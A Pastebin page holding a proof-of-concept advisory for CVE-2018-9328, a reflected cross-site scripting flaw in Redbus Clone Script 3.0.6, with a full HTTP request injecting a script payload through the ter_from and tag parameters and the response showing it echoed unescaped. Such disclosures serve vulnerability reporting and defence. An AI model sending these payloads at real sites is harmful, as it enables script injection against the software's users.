API tools faq
paste
Advertisement
ManhNho

CVE-2018-9328

ManhNho
Apr 5th, 2018
4,109
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: Redbus Clone Script 3.0.6 - Cross-Site Scripting
  2. # Date: 22.03.2018
  3. # Vendor Homepage: https://www.phpscriptsmall.com/
  4. # Software Link: https://www.phpscriptsmall.com/product/redbus-clone/
  5. # Category: Web Application
  6. # Exploit Author: ManhNho
  7. # Version: 3.0.6
  8. # CVE: CVE-2018-9328
  9. # Tested on: Window 10
  10.  
  11. PoC
  12. --------------------------------------------------------------
  13. Request:
  14.  
  15. GET /~materialmag/demo/redbus-clone-responsive/results.php?triptype=1&ter_from=%27);%3Cscript%3Ealert(%221%22);%3C/script%3E&tag=%27);%3Cscript%3Ealert(%221%22);%3C/script%3E&datepicker=23-03-2018&datepicker1=&type=bus HTTP/1.1
  16. Host: <Target>
  17. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  18. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  19. Accept-Language: en-GB,en;q=0.5
  20. Accept-Encoding: gzip, deflate
  21. Cookie: PHPSESSID=a26646fb257df1e606dbd65bbb67cfa2
  22. Connection: close
  23. Upgrade-Insecure-Requests: 1
  24.  
  25. --------------------------------------------------------------
  26. Response:
  27.  
  28. HTTP/1.1 200 OK
  29. Date: Thu, 22 Mar 2018 09:48:34 GMT
  30. Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
  31. X-Powered-By: PHP/5.4.45
  32. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  33. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  34. Pragma: no-cache
  35. Connection: close
  36. Content-Type: text/html
  37. Content-Length: 48308
  38. ...
  39. <div class="row" style="background-color: #435255; color: #fff; padding: 10px 10px 0px 10px;">
  40. <div class="container text-center" >
  41. <div class="col-md-1"><button style="margin-bottom: 10px;" type="button" onclick="change_val();" class="btn btn-danger">Modify</button></div>
  42. <div class="col-md-5" style="border-right: solid 1px #ccc; margin-bottom: 10px;">
  43. <span style="font-size:14px; color:#fff; "> <strong>Journey Date</strong> </span>
  44. <span ><a href="results.php?ter_from=');<script>alert("1");</script>&tag=');<script>alert("1");</script>&datepicker=23-03-2018&backward"><img src="images/bef.JPG" width="24" height="24"/></a></span>
  45. <span style="font-size:12px; color:#fff; vertical-align:center;">23-03-2018</span>
  46. <span> <a href="results.php?ter_from=');<script>alert("1");</script>&tag=');<script>alert("1");</script>&datepicker=23-03-2018&forward"><img src="images/aft.JPG" width="24" height="24"/></a> </span>
  47. </div>
  48. <div class="col-md-6"></div>
  49. </div>
  50. </div>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!